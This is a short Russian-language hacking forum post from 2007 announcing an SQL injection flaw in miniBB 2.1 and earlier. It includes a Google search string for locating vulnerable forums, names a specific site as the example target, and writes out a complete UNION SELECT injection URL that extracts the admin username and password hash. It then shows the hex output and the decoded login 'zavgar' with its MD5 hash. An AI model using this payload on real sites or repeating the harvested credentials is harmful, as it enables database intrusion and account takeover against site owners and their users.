
01.11.2007, 14:10
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
С нами:
10467746
Репутация:
4738
|
|
SQL-inj в miniBB<=2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «table» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
Поиск в Гугл: "forum script miniBB"
Пример: _www.icealeko.ru/forums
Код:
_http://www.icealeko.ru/forums/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/*
Получаем вывод в HEX (без кодирования, а так же с AES_DECRYPT(AES_ENCRYPT()) вывода нет):
Код:
7A6176676172203530373434336430323063666261353833636166306631636539653536323163
Конвертируем HEX->ASCII - получаем логин и хэш
Код:
zavgar 507443d020cfba583caf0f1ce9e5621c
|
|
|